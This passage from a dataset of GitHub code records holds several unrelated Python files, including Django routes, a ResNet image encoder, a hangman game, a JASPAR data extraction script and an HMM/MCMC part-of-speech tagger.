name='list_create_articles')\nget_article_byId = path(\n '', RetrieveUpdateArticleByIdApiView.as_view(), name='get_article_byId')\nget_article_bySlug = path(\n '', GetArticleBySlugApiView.as_view(), name='get_article_bySlug')\nadd_article_ratings = path(\n 'add_rates/', RateCreateAPIView.as_view(), name='add_article_ratings')\nview_average_article_ratings = path(\n 'view_rates/', RateRetrieveAPIView.as_view(), name='view_average_article_ratings')\nview_article_like_status = path(\n '/like_status', LikeArticlesView.as_view(), name='view_article_like_status')\nshare_article_via_email = path(\n '/email', ShareArticleViaEmailAPIView.as_view(), name='share_article_via_email')\nshare_article_via_facebook = path(\n '/facebook', ShareArticleViaFacebookAPIView.as_view(), name='share_article_via_facebook')\nshare_article_via_twitter = path(\n '/twitter', ShareArticleViaTwitterAPIView.as_view(), name='share_article_via_twitter')\nreport_article_view = path(\n '/report_status', ReportArticlesView.as_view(), name='report_article_view')\n\nurlpatterns = [\n list_create_articles,\n get_article_byId,\n get_article_bySlug,\n add_article_ratings,\n view_average_article_ratings,\n view_article_like_status,\n share_article_via_email,\n share_article_via_facebook,\n share_article_via_twitter,\n report_article_view,\n \n]\n","repo_name":"andela/ah-backend-thor","sub_path":"authors/apps/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11351354279","text":"import torch.nn as nn\nimport torchvision.models as models\nimport torch\n\n#####################\n# Encoder RESNET CNN\n#####################\nclass Encoder(nn.Module):\n def __init__(self):\n super(Encoder, self).__init__()\n resnet = models.resnet101(pretrained=True)\n self.resnet = nn.Sequential(*list(resnet.children())[:-2])\n self.adaptive_pool = nn.AdaptiveAvgPool2d((14, 14))\n\n def forward(self, images):\n out = self.adaptive_pool(self.resnet(images))\n # batch_size, img size, imgs size, 2048\n out = out.permute(0, 2, 3, 1)\n return out","repo_name":"quanglegl1404/Image-Captioning","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3950518683","text":"#!/usr/bin/python3\n# Juego del ahorcado\n# by @M4lal0\n# -*- coding: utf-8 -*-\n\nimport random\nimport subprocess,sys\nimport platform\nimport time\nimport base64\n\nclass bcolors:\n PURPLE = '\\033[95m'\n BLUE = '\\033[94m'\n YELLOW = '\\033[93m'\n GREEN = '\\033[92m'\n RED = '\\033[91m'\n DARKCYAN = '\\033[36m'\n UNDERLINE = '\\033[4m'\n BOLD = '\\033[1m'\n ENDC = '\\033[0m'\n\n\nIMAGES = ['''\n +---+\n | |\n |\n |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n | |\n |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n | |\n / |\n =========''', '''\n +---+\n | |\n O |\n /|\\ |\n | |\n / \\ |\n =========''', '''\n''']\n\nWORDS_EASY = ('cGVsaWN1bGE=','b2JsaWdhY2lvbg==','ZXN0YWRvcw==','ZnVlZ28=','Y2FyYQ==','c29mYQ==','Y2FtaXNh','YWR1bHRv','YWlyZQ==','bWVzYQ==','cGFu','dm9sY2Fu')\nWORDS_MEDIUM = ('bWljcm9zb2Z0','ZmFjZWJvb2s=','dGVzbGE=','dHdpdHRlcg==','YW1hem9u','dGVsZWZvbmljYQ==','YXZpb25ldGE=','ZGVtb2NyYWNpYQ==','Y29tcHV0YWRvcmE=','Z29iaWVybm8=')\nWORDS_HARD = ('YW50aWNvbnN0aXR1Y2lvbmFsbWVudGU=','cGFyYW5nYXJpY3V0aXJpbWljdWFybw==','b3RvcnJpbm9sYXJpbmdvbG9naWE=','aW5zdGl0dWNpb25hbGl6YWNpb24=','ZXN0ZXJub2NsZWlkb21hc3RvaWRlbw==','ZWxlY3Ryb2VuY2VmYWxvZ3JhbWE=')\n\n\ndef random_word(option):\n if option == \"1\":\n idx = random.randint(0, len(WORDS_EASY) - 1)\n return decodeBase64(WORDS_EASY[idx])\n elif option == \"2\":\n idx = random.randint(0, len(WORDS_MEDIUM) - 1)\n return decodeBase64(WORDS_MEDIUM[idx])\n elif option == \"3\":\n idx = random.randint(0, len(WORDS_HARD) - 1)\n return decodeBase64(WORDS_HARD[idx])\n else:\n return None\n\n\ndef decodeBase64(theword):\n base64_message = theword\n base64_bytes = base64_message.encode('ascii')\n message_bytes = base64.b64decode(base64_bytes)\n message = message_bytes.decode('ascii')\n return message\n\n\ndef display_board(hidden_word, tries):\n print(IMAGES[tries])\n print('')\n print(hidden_word)\n print('--- * --- * --- * --- * --- * --- ')\n\n\ndef Clear():\n subprocess.Popen( \"cls\" if platform.system() == \"Windows\" else \"clear\", shell=True)\n time.sleep(0.1)\n\n\ndef display_banner():\n banner = \"\\n ╔═══╗╔╗ ╔╗ \\n\"\n banner += \" ║╔═╗║║║ ║║ \\n\"\n banner += \" ║║ ║║║╚═╗╔══╗╔═╗╔══╗╔══╗ ╔═╝║╔══╗\\n\"\n banner += \" ║╚═╝║║╔╗║║╔╗║║╔╝║╔═╝╚ ╗║ ║╔╗║║╔╗║\\n\"\n banner += \" ║╔═╗║║║║║║╚╝║║║ ║╚═╗║╚╝╚╗║╚╝║║╚╝║\\n\"\n banner += \" ╚╝ ╚╝╚╝╚╝╚══╝╚╝ ╚══╝╚═══╝╚══╝╚══╝\\n\"\n banner += \"--[ Juego del ahorcado | v20.02 ]--\"\n return print(bcolors.DARKCYAN + banner + bcolors.ENDC)\n\n\ndef main():\n display_banner()\n print(\"\"\"\\nDifficulty:\n [1] - Easy\n [2] - Medium\n [3] - Hard\"\"\")\n option = input(\"Select an option [1-3]: \")\n if option == \"1\" or option == \"2\" or option == \"3\":\n Clear()\n word = random_word(option)\n hidden_word = ['-'] * len(word)\n tries = 0\n\n while True:\n Clear()\n display_banner()\n display_board(hidden_word, tries)\n current_letter = str(input('Type a letter: '))\n\n letter_indexes = []\n for idx in range(len(word)):\n if word[idx] == current_letter:\n letter_indexes.append(idx)\n\n if len(letter_indexes) == 0:\n tries += 1\n\n if tries == 7:\n Clear()\n display_banner()\n display_board(hidden_word, tries)\n print(bcolors.RED + \"\\n¡Game over! You lost. The correct word was: {0}\".format(word) + bcolors.ENDC)\n break\n else:\n for idx in letter_indexes:\n hidden_word[idx] = current_letter\n\n letter_indexes = []\n\n try:\n hidden_word.index('-')\n except ValueError:\n Clear()\n display_banner()\n display_board(hidden_word, tries)\n print(bcolors.GREEN + \"\\n¡Congratulation! You win. The word is: {0}\".format(word) + bcolors.ENDC)\n break\n else:\n print(\"Option invalid!\")\n time.sleep(1)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()","repo_name":"m4lal0/Ahorcado_Game","sub_path":"ahorcados.py","file_name":"ahorcados.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70858348588","text":"# Data related utility functions.\nimport pandas as pd\nimport os\n\n\n# Reads data from .env file\ndef load_dotenv():\n \"\"\"\n Reads data from .env file\n\n Returns:\n - dict: A dictionary containing the data from the .env file.\n \"\"\"\n dotenv_path = os.path.join(os.getcwd(), \".env\")\n dotenv_dict = {}\n\n with open(dotenv_path, \"r\") as dotenv_file:\n for line in dotenv_file:\n line = line.strip()\n\n if line.startswith(\"#\") or not line:\n continue\n\n key, value = line.split(\"=\", 1)\n dotenv_dict[key] = value\n\n return dotenv_dict\n\n\n# Read a data file into a pandas DataFrame based on its extension.\ndef read_data_file(file_path, **kwargs):\n \"\"\"\n Read a data file into a pandas DataFrame based on its extension.\n\n Parameters:\n - file_path (str): Path to the data file.\n\n Returns:\n - DataFrame: The data loaded into a pandas DataFrame.\n \"\"\"\n\n extension_read_function_mapping = {\n \".csv\": pd.read_csv,\n \".xlsx\": pd.read_excel,\n \".xls\": pd.read_excel,\n \".tsv\": lambda x, **y: pd.read_csv(x, delimiter=\"\\t\", **y),\n \".json\": pd.read_json,\n \".parquet\": pd.read_parquet,\n \".feather\": pd.read_feather,\n \".dta\": pd.read_stata,\n \".pkl\": pd.read_pickle,\n \".sas7bdat\": pd.read_sas,\n }\n\n _, file_extension = os.path.splitext(file_path)\n\n read_function = extension_read_function_mapping.get(file_extension)\n\n if read_function is None:\n raise ValueError(f\"Unsupported file extension: {file_extension}.\")\n\n return read_function(file_path, **kwargs)\n","repo_name":"mijki/zengrid-analysis","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35026458699","text":"import xml.etree.ElementTree as ET\r\n\r\n# Function to arrange vehicle trips in ascending order of depart time\r\ndef arrange_trips_by_depart_time(input_file, output_file):\r\n tree = ET.parse(input_file)\r\n root = tree.getroot()\r\n\r\n # Get all trip elements and sort them by depart time\r\n trips = root.findall(\".//trip\")\r\n sorted_trips = sorted(trips, key=lambda x: float(x.attrib[\"depart\"]))\r\n\r\n # Create a new root element and add the sorted trips to it\r\n sorted_root = ET.Element(root.tag, root.attrib)\r\n for trip in sorted_trips:\r\n sorted_root.append(trip)\r\n\r\n # Write the sorted trips to the output file\r\n sorted_tree = ET.ElementTree(sorted_root)\r\n sorted_tree.write(output_file)\r\n\r\n# Modify the trips file\r\ninput_file = \"tenbus.xml\"\r\noutput_file = \"tenbus.trips.xml\"\r\narrange_trips_by_depart_time(input_file, output_file)\r\nprint(f\"Sorted trips file generated: {output_file}\")\r\n","repo_name":"Skhem02/Explainable-AI-for-Planning-Vehicular-Traffic-Infrastructure-7sem","sub_path":"XAI-7sem/sorttrips.py","file_name":"sorttrips.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2347144182","text":"import os\nimport pandas as pd\n\ndf = pd.read_csv(\"PATH/TO/YOUR/BED_FILE.bed\", header=0, sep=\"\\t\")\n\nfor i, row in df.iterrows():\n # This command is for Linux OS\n command = './bigBedToBed http://hgdownload.soe.ucsc.edu/gbdb/hg38/jaspar/JASPAR2022.bb OUTPUT_FOLDER/JASPAR__%s.bed -chrom=%s -start=%s -end=%s' % (row['id'], row['chr'], row['start'], row['end'])\n print(command)\n os.system(command)\n\nprint(\"Completed !\")","repo_name":"UdithaM/jaspar-transcription-factors-extraction","sub_path":"jaspar_extractor.py","file_name":"jaspar_extractor.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25786905782","text":"import numpy as np\n\n\nclass Solver:\n # Calculate the log of the posterior probability of a given sentence\n def __init__(self):\n self.transition_dict = {}\n self.tag_to_word_dict = {}\n self.tag_dict={}\n self.word_dict={}\n self.initial_prob_tag_dict = {}\n self.transition_2_dict = {}\n \n def posterior(self, model, sentences, labels):\n if model == \"Simple\": \n log_prob = 0\n for word , tag in zip(sentences, labels):\n #P(W=word|S=tag)\n if word not in self.tag_to_word_dict[tag].keys():\n prob_w_t = 0.0000001\n else:\n prob_w_t = self.tag_to_word_dict[tag][word]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n #P(S=tag|W=word) = P(W=word|S=tag)P(S=tag)/P(all words)\n #the denominator is constssant and thus only numeration is significant.\n prob_t_w = prob_w_t * (self.tag_dict[tag]/sum(self.tag_dict.values()))\n log_prob += np.log(prob_t_w)\n return log_prob\n#\n elif model == \"Complex\":\n log_prob = 0\n for i in range(len(sentences)):\n #P(W=word|S=tag)\n prob_w_t = self.tag_to_word_dict.get(labels[i]).get(sentences[i],0.0000001)\n if prob_w_t != 0.0000001:\n prob_w_t = prob_w_t/self.tag_to_word_dict.get(labels[i]).get('word_count_with_tag')\n #P(S=tag|W=word) = P(W=word|S=tag)P(S=tag)/P(all words)\n #the denominator is constant and thus only numeration is significant.\n prob_t_w = prob_w_t * (self.tag_dict[labels[i]]/sum(self.tag_dict.values()))\n if i == 0:\n prob_s = self.tag_dict[labels[i]]/sum(self.tag_dict.values())\n log_prob += np.log(prob_s)\n elif i == 1:\n prob_s_s1 = self.transition_dict.get(labels[i-1]).get(labels[i],0.0000001)\n if prob_s_s1 != 0.0000001:\n prob_s_s1 = prob_s_s1/self.transition_dict.get(labels[i-1]).get('transition_count')\n log_prob += np.log(prob_s_s1)\n else:\n prob_s_s2 = self.transition_2_dict.get(labels[i-2]).get(labels[i-1],0.0000001)\n if prob_s_s2 != 0.0000001:\n prob_s_s2 = self.transition_2_dict.get(labels[i-2]).get(labels[i-1]).get(labels[i],0.0000001)\n if prob_s_s2 != 0.0000001:\n prob_s_s2 = prob_s_s2/self.transition_2_dict.get(labels[i-2]).get(labels[i-1]).get('transition_count')\n log_prob += np.log(prob_s_s2)\n log_prob += np.log(prob_w_t)\n return log_prob\n \n elif model == \"HMM\":\n log_prob = 0\n for i in range(len(sentences)):\n if i == 0:\n prob_s0 = self.initial_prob_tag_dict.get(labels[i])\\\n /sum(self.initial_prob_tag_dict.values())\n log_prob = np.log(prob_s0)\n #P(W=word|S=tag)\n prob_w_t = self.tag_to_word_dict.get(labels[i]).get(sentences[i],0.0000001)\n if prob_w_t != 0.0000001:\n prob_w_t = prob_w_t/self.tag_to_word_dict.get(labels[i]).get('word_count_with_tag')\n #P(S=tag|W=word) = P(W=word|S=tag)P(S=tag)/P(all words)\n #the denominator is constant and thus only numeration is significant.\n prob_t_w = prob_w_t * (self.tag_dict[labels[i]]/sum(self.tag_dict.values()))\n prob_s_s1 = 1\n if i>=1:\n if self.transition_dict[labels[i-1]].get(labels[i]) != None:\n prob_s_s1 = self.transition_dict[labels[i-1]][labels[i]]\\\n /self.transition_dict[labels[i-1]]['transition_count']\n else:\n prob_s_s1 = 0.0000001\n log_prob += np.log(prob_s_s1)+np.log(prob_w_t)\n return log_prob\n \n else:\n print(\"Unknown algo!\")\n\n # Do the training!\n #%%\n def train(self, data):\n pos_tags = [x[1] for x in data]\n words = [x[0] for x in data]\n #creating transition dictionary to find P(Si+1|Si)\n for sentence in pos_tags:\n for i in range(len(sentence)-1):\n if sentence[i] not in self.transition_dict.keys():\n self.transition_dict[sentence[i]] = {'transition_count':0}\n if sentence[i+1] not in self.transition_dict[sentence[i]].keys():\n self.transition_dict[sentence[i]][sentence[i+1]] = 1\n else:\n self.transition_dict[sentence[i]][sentence[i+1]] += 1\n self.transition_dict[sentence[i]]['transition_count'] += 1\n \n #creating a two level transition dictionary for P(Si+1|Si,Si-1)\n for sentence in pos_tags:\n for i in range (len(sentence)-2):\n if sentence[i] not in self.transition_2_dict.keys():\n self.transition_2_dict[sentence[i]] = {}\n if sentence[i+1] not in self.transition_2_dict[sentence[i]].keys():\n self.transition_2_dict[sentence[i]][sentence[i+1]] = {'transition_count':0}\n if sentence[i+2] not in\\\n self.transition_2_dict[sentence[i]][sentence[i+1]].keys():\n self.transition_2_dict[sentence[i]][sentence[i+1]][sentence[i+2]] = 1\n else:\n self.transition_2_dict[sentence[i]][sentence[i+1]][sentence[i+2]] += 1\n self.transition_2_dict[sentence[i]][sentence[i+1]]['transition_count'] += 1 \n \n #finding tags that start a sentence\n initial_tags = [i[0] for i in pos_tags]\n \n #creating dictionary for initial tags for P(S0=Si)\n for tag in initial_tags:\n if tag not in self.initial_prob_tag_dict.keys():\n self.initial_prob_tag_dict[tag] = 1\n else:\n self.initial_prob_tag_dict[tag] += 1\n \n #creating tags dictionary for P(S=Si)\n for sentence in pos_tags:\n for tag in sentence:\n if tag not in self.tag_dict.keys():\n self.tag_dict[tag] = 1\n else:\n self.tag_dict[tag] += 1\n \n #creating words dictionary for P(W=Wi)\n for sentence in words:\n for word in sentence:\n if word not in self.word_dict.keys():\n self.word_dict[word] = 1\n else:\n self.word_dict[word] += 1 \n \n #creating flattened list of tags and words \n tags = [tag for sentence in pos_tags for tag in sentence]\n words = [word for sentence in words for word in sentence]\n \n word_data = []\n for i, j in zip(words,tags):\n word_data.append((i,j))\n \n tags = set(tags)\n \n #creating dictionary that stores tag wise list of words for P(W|S)\n for i in tags:\n temp_word_list = [word[0] for word in word_data if word[1] == i]\n if i not in self.tag_to_word_dict.keys():\n self.tag_to_word_dict[i] = {'word_count_with_tag':0}\n for word in temp_word_list:\n if word not in self.tag_to_word_dict[i].keys():\n self.tag_to_word_dict[i][word] = 1\n else:\n self.tag_to_word_dict[i][word] += 1\n self.tag_to_word_dict[i]['word_count_with_tag'] += 1\n \n#%%\n # Functions for each algorithm. Right now this just returns nouns -- fix this!\n #\n def simplified(self, sentence):\n \n tag_prob = {}\n total_tags = sum(self.tag_dict.values())\n for key in self.tag_dict:\n tag_prob[key] = self.tag_dict[key]/total_tags\n \n word_prob = {}\n total_words = sum(self.word_dict.values())\n for key in self.word_dict:\n word_prob[key] = self.word_dict[key]/total_words\n \n max_prob_list = []\n for w in sentence:\n max_prob = -99999\n max_s = ''\n if w not in self.word_dict.keys():\n max_s = 'noun'\n max_prob = 1\n else:\n for s in self.tag_dict:\n if w not in self.tag_to_word_dict[s].keys():\n prob_s_w = 0\n else: \n prob_s_w = (self.tag_to_word_dict[s][w]/self.tag_to_word_dict[s]['word_count_with_tag'])\\\n *(tag_prob[s]/word_prob[w])\n if(max_prob <= prob_s_w):\n max_prob = prob_s_w\n max_s = s \n max_prob_list.append(max_s)\n return max_prob_list\n\n def hmm_viterbi(self, sentence):\n viterbi_list = []\n \n for it in range(len(sentence)):\n tag_prob_dict = {'.':{},'adj':{},'adp':{},'adv':{},'conj':{},'det':{},'noun':{},'num':{},\\\n 'pron':{},'prt':{},'verb':{},'x':{}}\n for curr_tag in tag_prob_dict:\n # calculating P(W=sentence[it]|S=tag)\n if sentence[it] not in self.tag_to_word_dict[curr_tag].keys():\n prob_w_s = 0.000000001\n else:\n prob_w_s = self.tag_to_word_dict[curr_tag][sentence[it]]\\\n /self.tag_to_word_dict[curr_tag]['word_count_with_tag']\n \n #if a word in testing dataset is not present in training dataset, it is\n #more likely to be a noun. So I assign a probability of 1 for noun \n #and 0 for all other tags.\n if sentence[it] not in self.word_dict.keys():\n #if the new noun is in between the sentence, then use the previous entry\n #in viterbi list to keep track of the prev_tag. Else its the first word\n #in the sentence so no need to keep track of prev_tag.\n if len(viterbi_list)>0:\n prev_tag = max(viterbi_list[-1],key=lambda x:viterbi_list[-1][x]['prob'])\n tag_prob_dict = {'.':{'prob':0},\\\n 'adj':{'prob':0},\\\n 'adp':{'prob':0},\\\n 'adv':{'prob':0},\\\n 'conj':{'prob':0},\\\n 'det':{'prob':0},\\\n 'noun':{'prob':1,'prev_tag':prev_tag},\\\n 'num':{'prob':0},\\\n 'pron':{'prob':0},\\\n 'prt':{'prob':0},\\\n 'verb':{'prob':0},\\\n 'x':{'prob':0}}\n else:\n tag_prob_dict = {'.':{'prob':0},\\\n 'adj':{'prob':0},\\\n 'adp':{'prob':0},\\\n 'adv':{'prob':0},\\\n 'conj':{'prob':0},\\\n 'det':{'prob':0},\\\n 'noun':{'prob':1},\\\n 'num':{'prob':0},\\\n 'pron':{'prob':0},\\\n 'prt':{'prob':0},\\\n 'verb':{'prob':0},\\\n 'x':{'prob':0}}\n break\n \n #emmission prob = P(W=sentence[it]|S=tag)\n emm_prob = prob_w_s\n #check for start, if start then trans_prob = initial_probability,P(S0=tag)\n #else trans_prob = P(S=curr_tag|S=prev_tag)\n if it == 0: \n if curr_tag not in self.initial_prob_tag_dict.keys():\n init_prob = 0\n else:\n init_prob = self.initial_prob_tag_dict[curr_tag]\\\n /sum(self.initial_prob_tag_dict.values())\n tag_prob_dict[curr_tag]['prob'] = emm_prob * init_prob\n tag_prob_dict[curr_tag]['prev_tag'] = ''\n else:\n max_prob_list = []\n for prev_tag in viterbi_list[-1].keys():\n if curr_tag not in self.transition_dict[prev_tag].keys():\n trans_prob = 0\n else:\n trans_prob = self.transition_dict[prev_tag][curr_tag]\\\n /self.transition_dict[prev_tag]['transition_count']\n temp_prob = (viterbi_list[-1][prev_tag]['prob']*trans_prob,prev_tag)\n max_prob_list.append(temp_prob)\n likely_tag = max(max_prob_list, key=lambda x:x[0])\n tag_prob_dict[curr_tag]['prob'] = emm_prob*likely_tag[0]\n tag_prob_dict[curr_tag]['prev_tag'] = likely_tag[1]\n viterbi_list.append(tag_prob_dict)\n \n #Find the tag with the max probability at start for backtracking\n most_prob_seq = []\n probable_tag = max(viterbi_list[-1],key=lambda x:viterbi_list[-1][x]['prob'])\n most_prob_seq.append(probable_tag)\n viterbi_list = viterbi_list[::-1]\n #Start backtracking..\n for i in viterbi_list[:-1]:\n tag_in_seq = i[probable_tag]['prev_tag']\n most_prob_seq.append(tag_in_seq)\n probable_tag = i[probable_tag]['prev_tag']\n return most_prob_seq[::-1]\n\n \n def calc_prob_distribution(self ,sample_tags ,sentence ,tag_position):\n tags = ['.','adj','adp','adv','conj','det','noun','num','pron','prt','verb','x']\n prob_dist = []\n #if word not in traing data, then its most likely a noun\n if sentence[tag_position] not in self.word_dict.keys():\n return [0,0,0,0,0,0,1,0,0,0,0,0]\n if len(sentence)==1:\n if sentence[0] not in self.word_dict.keys():\n return [0,0,0,0,0,0,1,0,0,0,0,0]\n else:\n for tag in tags:\n if sentence[0] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[0]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s = self.tag_dict[tag]/sum(self.tag_dict.values())\n prob_dist.append(prob_w_s*prob_s)\n sum_prob = sum(prob_dist)\n prob_dist = [x/sum_prob for x in prob_dist]\n return prob_dist\n \n for i in range (len(sentence)):\n prod = 1\n if i == len(sentence)-1 and tag_position == i and i > 0:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[i]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get(tag)\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = prob_s_s2_prev/self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get('transition_count')\n prob_dist.append(prob_w_s * prob_s_s2_prev)\n \n elif i == 0 and tag_position == 0:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[tag_position]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s = self.tag_dict[tag]/sum(self.tag_dict.values()) \n if sample_tags[i+1] not in self.transition_dict[tag].keys():\n prob_s_s1 = 0.0000001\n else:\n prob_s_s1 = self.transition_dict[tag][sample_tags[1]]\\\n /self.transition_dict[tag]['transition_count']\n prob_dist.append(prob_w_s*prob_s*prob_s_s1)\n \n elif i == 0 and tag_position != 0:\n if sentence[i] not in self.tag_to_word_dict[sample_tags[i]].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[sample_tags[i]][sentence[i]]\\\n /self.tag_to_word_dict[sample_tags[i]]['word_count_with_tag']\n prob_s = self.tag_dict[sample_tags[i]]/sum(self.tag_dict.values())\n prod = prod * prob_w_s * prob_s\n elif i == 1 and tag_position == 1:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[i]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n if tag not in self.transition_dict[sample_tags[i-1]].keys():\n prob_s_s1 = 0.0000001\n else:\n prob_s_s1 = self.transition_dict[sample_tags[i-1]][tag]\\\n /self.transition_dict[sample_tags[i-1]]['transition_count']\n prob_s_s2 = self.transition_2_dict[sample_tags[0]].get(tag)\n if prob_s_s2 == None:\n prob_s_s2 = 0.0000001\n else:\n prob_s_s2 = self.transition_2_dict[sample_tags[0]].get(tag).get(sample_tags[2])\n if prob_s_s2 == None:\n prob_s_s2 = 0.0000001\n else:\n prob_s_s2 = prob_s_s2/self.transition_2_dict[sample_tags[0]].get(tag).get('transition_count')\n prob_dist.append(prob_w_s*prob_s_s1*prob_s_s2)\n elif i == 1 and tag_position != i:\n if sentence[i] not in self.tag_to_word_dict[sample_tags[i]].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[sample_tags[i]][sentence[i]]\\\n /self.tag_to_word_dict[sample_tags[i]]['word_count_with_tag']\n if tag_position > i:\n if sample_tags[i] not in self.transition_dict[sample_tags[i-1]].keys():\n prob_s_s1 = 0.0000001\n else:\n prob_s_s1 = self.transition_dict[sample_tags[i-1]][sample_tags[i]]\\\n /self.transition_dict[sample_tags[i-1]]['transition_count']\n prod = prod * prob_w_s * prob_s_s1\n elif tag_position < i:\n prod = prod * prob_w_s \n \n elif i > 1 and tag_position == i:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[i]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get(tag)\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = prob_s_s2_prev/self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get('transition_count')\n prob_s_s2_next = self.transition_2_dict[sample_tags[i-1]].get(tag)\n if prob_s_s2_next == None:\n prob_s_s2_next = 0.0000001\n else:\n prob_s_s2_next = self.transition_2_dict[sample_tags[i-1]].get(tag).get(sample_tags[i+1])\n if prob_s_s2_next == None:\n prob_s_s2_next = 0.0000001\n else:\n prob_s_s2_next = prob_s_s2_next/self.transition_2_dict[sample_tags[i-1]].get(tag).get('transition_count')\n prob_dist.append(prob_w_s * prob_s_s2_prev * prob_s_s2_next)\n elif i > 1 and tag_position != i:\n if sentence[i] not in self.tag_to_word_dict[sample_tags[i]].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[sample_tags[i]][sentence[i]]\\\n /self.tag_to_word_dict[sample_tags[i]]['word_count_with_tag']\n if tag_position > i or tag_position < i-1:\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1])\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get(sample_tags[i])\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = prob_s_s2_prev/self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get('transition_count')\n prod = prod * prob_w_s * prob_s_s2_prev \n elif tag_position == i-1:\n prod = prod * prob_w_s\n prob_dist = [prod*x for x in prob_dist]\n sum_prob = sum(prob_dist)\n prob_dist = [x/sum_prob for x in prob_dist]\n return prob_dist\n \n def complex_mcmc(self, sentence):\n tags = ['.','adj','adp','adv','conj','det','noun','num','pron','prt','verb','x']\n iteration = 2500\n warm_period =500\n particles = []\n self.sentence = sentence\n sample = np.random.choice(tags,len(sentence))\n while(iteration>0):\n for i in range (0,len(sentence)):\n self.sample = sample\n prob_dist = self.calc_prob_distribution(sample,sentence,i)\n self.prob_dist = prob_dist\n sample[i] = np.random.choice(tags,1,p=prob_dist)[0]\n if iteration>= warm_period:\n particles.append(sample)\n iteration -= 1 \n sen_length = len(sentence)\n word_tag = {i:{} for i in range (0,sen_length)}\n for sample in particles:\n for i in range(0,sen_length):\n if sample[i] not in word_tag[i].keys():\n word_tag[i][sample[i]] = 1\n else:\n word_tag[i][sample[i]] += 1\n \n pred_tags = [max(word_tag[i],key=lambda x:word_tag[i][x]) for i in range(sen_length)]\n return pred_tags\n\n \n def solve(self, model, sentence):\n if model == \"Simple\":\n return self.simplified(sentence)\n elif model == \"Complex\":\n return self.complex_mcmc(sentence)\n elif model == \"HMM\":\n return self.hmm_viterbi(sentence)\n else:\n print(\"Unknown algo!\")\n\n","repo_name":"anuragkumar95/Projects","sub_path":"Parts of Speech Tagging/pos_tagging using HMM/pos_solver.py","file_name":"pos_solver.py","file_ext":"py","file_size_in_byte":23986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71559923309","text":"from PySide2.QtCore import Qt, QRectF, QPoint, Signal, Slot, QEvent\n\nfrom PySide2.QtWidgets import QWidget, QGraphicsView, QOpenGLWidget, QScrollBar\n\nfrom PySide2.QtGui import (\n QDragEnterEvent,\n QDragMoveEvent,\n QDropEvent,\n QMouseEvent,\n QPainter,\n QSurfaceFormat,\n QTransform,\n QWheelEvent,\n )\n\n\n# from PySide2.QtOpenGL import QGL, QGLFormat\n\nimport math\n\n\nclass TabletView(QGraphicsView):\n\n def __init__(self, parent : QWidget = None):\n QGraphicsView.__init__(self, parent)\n\n # glWidget = QOpenGLWidget()\n # f = QSurfaceFormat()\n # f.setSamples(4)\n # glWidget.setFormat(f)\n # self.setViewport(glWidget)\n\n # self.setDragMode(QGraphicsView.ScrollHandDrag)\n self.setRenderHint(QPainter.Antialiasing)\n\n self.setBackgroundBrush(Qt.lightGray)\n\n 